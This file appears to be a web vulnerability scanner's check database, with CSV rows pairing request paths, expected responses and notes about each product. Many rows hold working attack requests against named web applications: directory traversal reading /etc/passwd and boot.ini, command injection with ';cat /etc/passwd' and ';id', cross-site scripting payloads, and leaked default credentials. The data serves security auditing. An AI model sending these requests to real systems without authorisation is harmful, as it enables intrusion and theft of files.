c,generic,/,Admin_files/,200,GET,"This might be interesting..."
c,generic,/,advwebadmin/,200,GET,"This might be interesting...probably HostingController, www.hostingcontroller.com"
c,generic,/,akopia/,200,GET,"Akopia is installed."
c,generic,/,analog/,200,GET,"This might be interesting..."
c,generic,/,ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely.  http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@127.0.0.1', password file location 'ans_data/ans.passwd'"
c,generic,/,app/,200,GET,"This might be interesting..."
c,generic,/,apps/,200,GET,"This might be interesting..."
c,generic,/,archive/,200,GET,"This might be interesting..."
c,generic,/,article.php?article=4965&post=1111111111,"Unable to jump to row",GET,"PHP FirstPost can reveal MySQL errors and file system paths if invalid posts are sent."
c,generic,/,asp/,200,GET,"This might be interesting..."
c,generic,/,atc/,200,GET,"This might be interesting..."
c,generic,/,author.asp,200,GET,"May be FactoSystem CMS, which could include SQL injection problems which could not be tested remotely."
c,generic,/,awebvisit.stat,200,GET,"Just found this log file..."
c,generic,/,backup/,200,GET,"This might be interesting..."
c,generic,/,bak/,200,GET,"This might be interesting..."
c,generic,/,ban.bak,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
c,generic,/,ban.dat,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
c,generic,/,ban.log,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
c,generic,/,banmat.pwd,200,GET,"Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected."
c,generic,/,basilix.php3?request_id[DUMMY]=../../../../etc/passwd&RequestID=DUMMY&username=sec&password=secu,"root:",GET,"Remote file retrieval."
c,generic,/,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320."
c,generic,/,bc4j.html,"Business Components",GET,"Default Oracle page, may allow limited administration."
c,generic,/,beta/,200,GET,"This might be interesting..."
c,generic,/,bigconf.cgi,200,GET,"BigIP Configuration CGI"
c,generic,/,bin/,200,GET,"This might be interesting..."
c,generic,/,blah-whatever-badfile.jsp,"Script /",GET,"The web server is configured to respond with the web server path when requesting a non-existent .jsp file."
c,generic,/,blah123.php,"Failed opening ",GET,"PHP is configured to give descriptive error messages which can reveal file system paths."
c,generic,/,blah_badfile.shtml,200,GET,"Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","<!--#include virtual=\"/index.jsp\"-->"
c,generic,/,buy/,200,GET,"This might be interesting..."
c,generic,/,buynow/,200,GET,"This might be interesting..."
c,generic,/,c/,200,GET,"This might be interesting..."
c,generic,/,c32web.exe/ChangeAdminPassword,200,GET,"This CGI may contain a backdoor and may allow attackers to change the Cart32 admin password."
c,generic,/,ca/..\\..\\..\\..\\..\\..\\..\\..\\winnt/\\win.ini,"[fonts]",GET,"It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076"
c,generic,/,ca/..\\..\\..\\..\\..\\..\\/\\etc/\\passwd,"root:",GET,"It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076"
c,generic,/,ca//\\../\\../\\../\\../\\../\\../\\windows/\\win.ini,"[windows]",GET,"It is possible to read files on the server by adding through directory traversal by adding multiple /\\.. in front of file name. CAN-2000-1076"
c,generic,/,cache-stats/,200,GET,"This might be interesting..."
c,generic,/,cart/,200,GET,"This might be interesting..."
c,generic,/,categorie.php3?cid=june,"Unable to jump to row",GET,"Black Tie Project (BTP) can reveal MySQL errors and file system paths if an invalid cid is sent."
c,generic,/,catinfo,200,GET,"May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test."
c,generic,/,ccard/,200,GET,"This might be interesting..."
c,generic,/,cfcache.map,"Mapping",GET,"May leak directy listing, may also leave server open to a DOS. http://www.securiteam.com/windowsntfocus/ColdFusion_Information_Exposure__CFCACHE_Tag_.html"
c,generic,/,cfide/Administrator/startstop.html,200,GET,"can start/stop the server"
c,generic,/,class/mysql.class,"This program is free software",GET,"Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials."
c,generic,/,code/,"Index of ",GET,"This might be interesting..."
c,generic,/,com,"index of",GET,"Java class files may be browsable."
c,generic,/,COM,"index of",GET,"Java class files may be browsable."
c,generic,/,config/,"Index of ",GET,"This might be interesting..."
c,generic,/,Config1.htm,200,GET,"This may be a D-Link, some devices have a DoS condition if an oversized POST request is sent. This DoS was not tested. See http://www.phenoelit.de/stuff/dp-300.txt for info."
c,generic,/,contents.php?new_language=elvish&mode=select,200,GET,"Requesting a file with an invalid language selection from DC Portal may reveal the system path."
c,generic,/,counter/,"Index of ",GET,"This might be interesting..."
c,generic,/,cpanel/,200,GET,"Web-based control panel"
c,generic,/,cplogfile.log,200,GET,"XMB Magic Lantern forum 1.6b final (http://www.xmbforum.com) log file is readable remotely. Upgrade to the latest version."
c,generic,/,credit/,"Index of ",GET,"This might be interesting..."
c,generic,/,custdata/,200,GET,"This may be COWS (CGI Online Worldweb Shopping), and may be interesting..."
c,generic,/,customers/,"Index of ",GET,"This might be interesting..."
c,generic,/,dan_o.dat,200,GET,"Just found this log file..."
c,generic,/,dat/,200,GET,"This might be interesting..."
c,generic,/,data/,200,GET,"This might be interesting..."
c,generic,/,database/,200,GET,"Databases? Really??"
c,generic,/,databases/,200,GET,"Databases? Really??"
c,generic,/,db/,200,GET,"This might be interesting..."
c,generic,/,dbase/,200,GET,"This might be interesting..."
c,generic,/,dev/,200,GET,"This might be interesting..."
c,generic,/,devel/,200,GET,"This might be interesting..."
c,generic,/,development/,200,GET,"This might be interesting..."
c,generic,/,directory.php?dir=%3Bcat%20/etc/passwd,"root:",GET,"Marcus S. Xenakis directory.php script allows for command execution. CAN-2002-0434."
c,generic,/,DMR/,200,GET,"This might be interesting..."
c,generic,/,dms0,"DMSDUMP version",GET,"Default Oracle 9iAS allows access to Dynamic Monitoring Services"
c,generic,/,doc-html/,200,GET,"This might be interesting..."
c,generic,/,dostuff.php?action=modify_user,200,GET,"Blahz-DNS allows unauthorized users to edit user information. Upgrade to version 0.25 or higher. http://blahzdns.sourceforge.net/"
c,generic,/,down/,200,GET,"This might be interesting..."
c,generic,/,download.php?op=viewdownload,"Failed opening",GET,"PHPNuke allows file system paths to be revealed."
c,generic,/,download.php?op=viewdownload,"Fatal error",GET,"PHPNuke allows file system paths to be revealed."
c,generic,/,download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02."
c,generic,/,download/,200,GET,"This might be interesting..."
c,generic,/,downloads/,200,GET,"This might be interesting..."
c,generic,/,easylog/easylog.html,200,GET,"Just found this file..."
c,generic,/,employees/,200,GET,"This might be interesting..."
c,generic,/,examples/jsp/snp/anything.snp,200,GET,"Tomcat servlet gives lots of host information." 
c,generic,/,exe/,200,GET,"This might be interesting..."
c,generic,/,ext.ini.% 00.txt,200,GET,"BadBlue allows access restrictions to be bypassed by using a null byte."
c,generic,/,file-that-is-not-real-2002.php3,"Unable to open",GET,"PHP is configured to show the web root when sending error messages. Set display_errors to 'off'."
c,generic,/,file/,200,GET,"This might be interesting..."
c,generic,/,files/,200,GET,"This might be interesting..."
c,generic,/,forum/,200,GET,"This might be interesting..."
c,generic,/,fpadmin/,200,GET,"This might be interesting..."
c,generic,/,friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02."
c,generic,/,ftp/,200,GET,"This might be interesting..."
c,generic,/,getaccess,200,GET,"This may be an indication that the server is running getAccess for SSO"
c,generic,/,global.inc,200,GET,"PHP-Survey's include file should not be available via the web. Configure the web server to ignore .inc files or change this to global.inc.php"
c,generic,/,globals.jsa,200,GET,"Oracle globals.jsa file"
c,generic,/,guestbook/,200,GET,"This might be interesting..."
c,generic,/,guests/,200,GET,"This might be interesting..."
c,generic,/,GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system. CAN-2002-0341."
c,generic,/,help/,200,GET,"Help directory should not be accessible"
c,generic,/,hidden/,200,GET,"This might be interesting..."
c,generic,/,hitmatic/,200,GET,"This might be interesting..."
c,generic,/,hitmatic/analyse.cgi,200,GET,"Just found this cgi..."
c,generic,/,hits.txt,200,GET,"Just found this log file..."
c,generic,/,hit_tracker/,200,GET,"This might be interesting..."
c,generic,/,home.php?arsc_language=elvish,"Failed opening '",GET,"ARSC Really Simple Chat can reveal file system paths if an invalid language name is specified."
c,generic,/,home/,200,GET,"This might be interesting..."
c,generic,/,hostingcontroller/,200,GET,"This might be interesting...probably HostingController, www.hostingcontroller.com"
c,generic,/,htdocs/,200,GET,"This might be interesting..."
c,generic,/,html/,200,GET,"This might be interesting..."
c,generic,/,HyperStat/stat_what.log,200,GET,"Just found this file..."
c,generic,/,hyperstat/stat_what.log,200,GET,"Just found this log..."
c,generic,/,ibill/,200,GET,"This might be interesting..."
c,generic,/,idea/,200,GET,"This might be interesting..."
c,generic,/,ideas/,200,GET,"This might be interesting..."
c,generic,/,image/,"Index of ",GET,"index of image directory available"
c,generic,/,images/,"Index of ",GET,"index of image directory available"
c,generic,/,img-sys/,200,GET,"Default image directory should not allow directory listing."
c,generic,/,import/,200,GET,"This might be interesting..."
c,generic,/,inc/sendmail.inc,"This program is free software",GET,"Basilix allows its configuration files to be downloaded, which  may include the mysql auth credentials."
c,generic,/,includes/,200,GET,"This might be interesting..."
c,generic,/,incoming/,200,GET,"This might be interesting..."
c,generic,/,index.jsp%00x,"<%=",GET,"Bea WebLogic 6.1 SP 2 discloses souce by appending %00x to a jsp request. Upgrade to a version newer than 6.2 SP 2 for Win2k."
c,generic,/,index.php/123,"Premature end of script headers",GET,"Some versions of PHP reveal PHP's physical path on the server by appending /123 to the php file name."
c,generic,/,index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script >,"<script>alert('Vulnerable')</script>",GET,"MiniBB http://www.minibb.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,index.php?action=storenew&username=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02."
c,generic,/,index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;,"<script>alert('Vulnerable')</script>",GET,"PostNuke is vulnerable to cross site scripting (XSS). CA-2000-02."
c,generic,/,index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc,"resolv.conf",GET,"phpMyExplorer Allows attackers to read directories on the server."
c,generic,/,index.php?file=index.php,"Fatal error:",GET,"PHPNuke 5.4 allows file system paths to be shown in error messages."
c,generic,/,index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd,"root:",GET,"Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem."
c,generic,/,index.php?page=../../../../../../../../../../boot.ini,"boot loader",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)"
c,generic,/,index.php?page=../../../../../../../../../../etc/passwd,"root:",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)"
c,generic,/,index.php?sql_debug=1,"SQL query: ",GET,"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string."
c,generic,/,index.php?|=../../../../../../../../../etc/passwd,"root:",GET,"Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem."
c,generic,/,info/,200,GET,"This might be interesting..."
c,generic,/,install/,200,GET,"This might be interesting..."
c,generic,/,interchange/,200,GET,"Interchange chat is installed. Look for a high-numbered port like 20xx to find it running."
c,generic,/,intranet/,200,GET,"This might be interesting..."
c,generic,/,ip.txt,200,GET,"This may be User Online from http://www.elpar.net version 2.0, which has a remotely accessible log file."
c,generic,/,java-sys/,200,GET,"Default Java directory should not allow directory listing."
c,generic,/,java/,200,GET,"This might be interesting..."
c,generic,/,javadoc/,200,GET,"Documentation...?"
c,generic,/,javax,"index of",GET,"Java class files may be browsable."
c,generic,/,jdbc/,200,GET,"This might be interesting..."
c,generic,/,jigsaw/,200,GET,"Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS), update to latest at http://freshmeat.net/users/yveslafon/. CA-2000-02."
c,generic,/,Jigsaw/,200,GET,"Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS), update to latest at http://freshmeat.net/users/yveslafon/. CA-2000-02."
c,generic,/,launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02."
c,generic,/,launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02."
c,generic,/,lib/,200,GET,"This might be interesting..."
c,generic,/,library/,200,GET,"This might be interesting..."
c,generic,/,log.htm,200,GET,"Just found this log file..."
c,generic,/,log.html,200,GET,"Just found this log file..."
c,generic,/,log.txt,200,GET,"Just found this log file..."
c,generic,/,log/,200,GET,"Ahh...log information...fun!"
c,generic,/,logfile,200,GET,"Just found this log file..."
c,generic,/,logfile.htm,200,GET,"Just found this log file..."
c,generic,/,logfile.html,200,GET,"Just found this log file..."
c,generic,/,logfile.txt,200,GET,"Just found this log file..."
c,generic,/,logfile/,200,GET,"This might be interesting..."
c,generic,/,logfiles/,200,GET,"This might be interesting..."
c,generic,/,logger.html,200,GET,"Just found this log file..."
c,generic,/,logger/,200,GET,"This might be interesting..."
c,generic,/,logging/,200,GET,"This might be interesting..."
c,generic,/,login/,200,GET,"This might be interesting..."
c,generic,/,logs.txt,200,GET,"Just found this log file..."
c,generic,/,lpt9.xtp,"java.io.FileNotFoundException:",GET,"Resin 2.1 reveals the server path when a a DOS device is requested."
c,generic,/,manual.php,200,GET,"Does not filter input before passing to shell command. Try 'ls -l' as the man page entry."
c,generic,/,manual/,200,GET,"Web server manual? tsk tsk."
c,generic,/,midicart.mdb,200,GET,"MIDICART database is available for browsing. This should not be allowed via the web server."
c,generic,/,mlog.phtml,200,GET,"Remote file read vulnerability CVE-1999-0346"
c,generic,/,modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?name=Downloads&d_op=viewdownload,"Failed opening",GET,"PHPNuke allows file system paths to be revealed."
c,generic,/,modules.php?name=Downloads&d_op=viewdownload,"Fatal error",GET,"PHPNuke allows file system paths to be revealed."
c,generic,/,modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>",GET,"This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?name=Members_List&sql_debug=1,200,GET,"The PHP-Nuke install may allow attackers to enable debug mode and disclose sensitive information by adding sql_debug=1 to the query string."
c,generic,/,modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid,"uid=",GET,"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version."
c,generic,/,modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=0&file=0,"Failed opening ",GET,"PHP Nuke is configured to give descriptive error messages which can reveal file system paths."
c,generic,/,modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The DMOZGateway (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"This install of PHPNuke's modules.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The PHPNuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink,"Failed opening ",GET,"PHP Nuke is configured to give descriptive error messages which can reveal file system paths."
c,generic,/,modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2,<script>alert('Vulnerable')</script>,GET,"The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"The XForum (PHPNuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,modules.php?set_albumName=album01&id=aaw&op=modload&name=gallery&file=index&include=../../../../../../../../../etc/passwd,"root:",GET,"Gallery Addon for PhpNuke allows files to be read remotely. CAN-2001-0900."
c,generic,/,mod_ose_docs,"Oracle Servlet Engine",GET,"Default Oracle documentation found."
c,generic,/,mp3/,200,GET,"Uh oh..."
c,generic,/,myhome.php?action=messages&box=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,mylog.phtml?screen=/etc/passwd,"root:",GET,"Remote file read vulnerability CVE-1999-0346"
c,generic,/,ncl_items.html,200,GET,"This may allow attackers to reconfigure your Tektronix printer."
c,generic,/,ncl_items.shtml?SUBJECT=1,200,GET,"This may allow attackers to reconfigure your Tektronix printer."
c,generic,/,netget?sid=user&msg=300&file=../../../../../../../../../../etc/passwd,"root:",GET,"Sybex E-Trainer allows arbitrary files to be retrieved."
c,generic,/,netget?sid=user&msg=300&file=../../../../../../../../../boot.ini,"boot loader",GET,"Sybex E-Trainer allows arbitrary files to be retrieved."
c,generic,/,new/,200,GET,"This might be interesting..."
c,generic,/,newuser?Image=../../database/rbsserv.mdb,"SystemErrorsPerHour",GET,"The Extent RBS ISP 2.5 allows attackers to read arbitrary files on the server."
c,generic,/,opendir.php?/etc/passwd,"root:",GET,"This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321"
c,generic,/,opendir.php?requesturl=/etc/passwd,"root:",GET,"This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321"
c,generic,/,oprocmgr-status,"Module Name",GET,"Oracle 9iAS default install allows access to the Java Process Manager."
c,generic,/,oracle/,200,GET,"This might be interesting..."
c,generic,/,order/,200,GET,"This might be interesting..."
c,generic,/,orders/,200,GET,"This might be interesting..."
c,generic,/,outgoing/,200,GET,"This might be interesting..."
c,generic,/,page.cgi?../../../../../../../../../../etc/passwd,"root:",GET,"WWWeBBB Forum up to version 3.82beta allow arbitrary file retrieval."
c,generic,/,pages/,200,GET,"This might be interesting..."
c,generic,/,passwd,200,GET,"This could be interesting..."
c,generic,/,passwd.adjunct,200,GET,"This could be interesting..."
c,generic,/,passwd.txt,200,GET,"This could be interesting..."
c,generic,/,password,200,GET,"This could be interesting..."
c,generic,/,passwords.txt,200,GET,"This could be interesting..."
c,generic,/,passwords/,200,GET,"This might be interesting..."
c,generic,/,PDG_Cart/,200,GET,"This might be interesting..."
c,generic,/,perl/,"Index of ",GET,"This should probably not be browsable."
c,generic,/,perl5/,200,GET,"This might be interesting..."
c,generic,/,php.ini,200,GET,"This file should not be available through the web interface."
c,generic,/,php/,200,GET,"This might be interesting..."
c,generic,/,phpimageview.php?pic=javascript:alert('Vulnerable'),"alert('Vulnerable')",GET,"PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).  CA-2000-02." 
c,generic,/,phpinfo.php,200,GET,"Contains PHP configuration information"
c,generic,/,phpinfo.php3,200,GET,"Contains PHP configuration information"
c,generic,/,phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid,"uid=",GET,"PHP-Nuke add-on NetTools below 0.3 allow for command execution. Upgrade to a new version."
c,generic,/,phptonuke.php?filnavn=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"PHPNuke add-on PHPToNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,piranha/secure/passwd.php3,200,GET,"This might be interesting..."
c,generic,/,pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit,"<script>alert('Vulnerable')</script>",GET,"IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello,"<script>alert('Vulnerable')</script>",GET,"WoltLab Burning Board is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,porn/,200,GET,"Uh oh..."
c,generic,/,pr0n/,200,GET,"Uh oh..."
c,generic,/,private/,200,GET,"This might be interesting..."
c,generic,/,pron/,200,GET,"Uh oh..."
c,generic,/,pub/,200,GET,"This might be interesting..."
c,generic,/,public/,200,GET,"This might be interesting..."
c,generic,/,purchase/,200,GET,"This might be interesting..."
c,generic,/,purchases/,200,GET,"This might be interesting..."
c,generic,/,pw/,200,GET,"This might be interesting..."
c,generic,/,quikstore.cfg,200,GET,"Shopping cart config file, http://www.quikstore.com/, http://www.mindsec.com/advisories/post2.txt"
c,generic,/,quikstore.cgi,200,GET,"Shopping cart. It may be interesting..."
c,generic,/,register/,200,GET,"This might be interesting..."
c,generic,/,registered/,200,GET,"This might be interesting..."
c,generic,/,replymsg.php?send=1&destin=<script>alert('Vulnerable')</script>,<script>alert('Vulnerable')</script>,GET,"This version of PHP-Nuke's replymsg.php is vulnerable to Cross Site Scripting (XSs). CA-2000-02."
c,generic,/,reports/,200,GET,"This might be interesting..."
c,generic,/,reseller/,200,GET,"This might be interesting..."
c,generic,/,restricted/,200,GET,"This might be interesting..."
c,generic,/,retail/,200,GET,"This might be interesting..."
c,generic,/,reviews/newpro.cgi,200,GET,"This might be interesting..."
c,generic,/,root/,"Index of ",GET,"This might be interesting..."
c,generic,/,rtm.log,"HttpPost Retry",GET,"Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information."
c,generic,/,sales/,200,GET,"This might be interesting..."
c,generic,/,script>alert('Vulnerable')</script>.cfm,"<script>alert('Vulnerable')</script>",GET,"Macromedia's ColdFusion MX server is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Patch or upgrade to a newer version, or change the default 404 document. http://www.macromedia.com/v1/handlers/index.cfm?ID=23047"
c,generic,/,scripts,"Index of ",GET,"Remote scripts directory is browsable."
c,generic,/,scripts/weblog,200,GET,"This might be interesting..."
c,generic,/,search.vts,200,GET,"This might be interesting..."
c,generic,/,search/,"Sample Search Interface",GET,"Default iPlanet search is enabled."
c,generic,/,search97.vts,200,GET,"This might be interesting..."
c,generic,/,secret/,200,GET,"This might be interesting..."
c,generic,/,secure/,"Index of ",GET,"This might be interesting..."
c,generic,/,securecontrolpanel/,200,GET,"Web Server Control Panel"
c,generic,/,secured/,"Index of ",GET,"This might be interesting..."
c,generic,/,sell/,200,GET,"This might be interesting..."
c,generic,/,server_stats/,"Index of ",GET,"This might be interesting..."
c,generic,/,SetSecurity.shm,200,GET,"Cisco System's My Access for Wireless... This resource should be password protected."
c,generic,/,setup.exe?<script>alert('Vulnerable')</script>&page=list_users&user=P,"<script>alert('Vulnerable')</script>",GET,"CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,setup/,200,GET,"This might be interesting..."
c,generic,/,sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script>,"<script>alert('Vulnerable')</script>",GET,"Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). ĘCAN-2002-0375. CA-2000-02."
c,generic,/,shop/,200,GET,"This might be interesting..."
c,generic,/,shopadmin.asp,200,GET,"VP-ASP shopping cart admin mayy be available via the web. Default ID/PW are vpasp/vpasp and admin/admin."
c,generic,/,shopa_sessionlist.asp,200,GET,"VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available."
c,generic,/,shopdbtest.asp,"xDatabase",GET,"VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase)."
c,generic,/,shopper/,200,GET,"This might be interesting..."
c,generic,/,shopping300.mdb,200,GET,"VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available."
c,generic,/,shopping400.mdb,200,GET,"VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available."
c,generic,/,SilverStream,"/Pages",GET,"SilverStream allows directory listing"
c,generic,/,site/iissamples/,200,GET,"This might be interesting..."
c,generic,/,siteminder,200,GET,"This may be an indication that the server is running Siteminder for SSO"
c,generic,/,SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator,"Event Log",GET,"SiteScope service has no password set. Restrict by IP and set a password."
c,generic,/,smssend.php,200,GET,"PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php"
c,generic,/,software/,"Index of ",GET,"This might be interesting..."
c,generic,/,source/,"Index of ",GET,"This might be interesting..."
c,generic,/,splashAdmin.php,200,GET,"Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely." 
c,generic,/,sql/,"Index of ",GET,"This might be interesting..."
c,generic,/,src/,"Index of ",GET,"This might be interesting..."
c,generic,/,srchadm,200,GET,"This might be interesting..."
c,generic,/,ss.cfg,200,GET,"This might be interesting..."
c,generic,/,ssi/,"Index of ",GET,"This might be interesting..."
c,generic,/,staff/,200,GET,"This might be interesting..."
c,generic,/,stat.htm,200,GET,"Just found this log file..."
c,generic,/,stat/,200,GET,"This might be interesting..."
c,generic,/,statistic/,200,GET,"This might be interesting..."
c,generic,/,statistics/,200,GET,"This might be interesting..."
c,generic,/,stats.htm,200,GET,"Just found this log file..."
c,generic,/,stats.html,200,GET,"Just found this log file..."
c,generic,/,stats.txt,200,GET,"Just found this log file..."
c,generic,/,Stats/,200,GET,"This might be interesting..."
c,generic,/,stats/,200,GET,"This might be interesting..."
c,generic,/,status/,200,GET,"This might be interesting..."
c,generic,/,store/,200,GET,"This might be interesting..."
c,generic,/,StoreDB/,200,GET,"This might be interesting..."
c,generic,/,style/,"Index of ",GET,"May be able to view web styles directory."
c,generic,/,styles/,"Index of ",GET,"May be able to view web styles directory."
c,generic,/,submit.php?subject=<script>alert('Vulnerable')</script>&story=<script>alert('Vulnerable')</script>&storyext=<script>alert('Vulnerable')</script>&op=Preview","<script>alert('Vulnerable')</script>",GET,"This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
c,generic,/,super_stats/access_logs,200,GET,"This might be interesting..."
c,generic,/,support/,200,GET,"This might be interesting..."
c,generic,/,sys/,200,GET,"This might be interesting..."
c,generic,/,system/,200,GET,"This might be interesting..."
c,generic,/,temp/,200,GET,"This might be interesting..."
c,generic,/,template/,200,GET,"This may be interesting as the directory may hold sensitive files or reveal system information."
c,generic,/,test/,200,GET,"This might be interesting..."
c,generic,/,testing/,200,GET,"This might be interesting..."
c,generic,/,ticket.php?id=99999,"expects first argument",GET,"ZenTrack from http://zentrack.phpzen.net/ versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors."
c,generic,/,tmp/,200,GET,"This might be interesting..."
c,generic,/,tools/,200,GET,"This might be interesting..."
c,generic,/,trafficlog/,200,GET,"This might be interesting..."
c,generic,/,tree/,200,GET,"This might be interesting..."
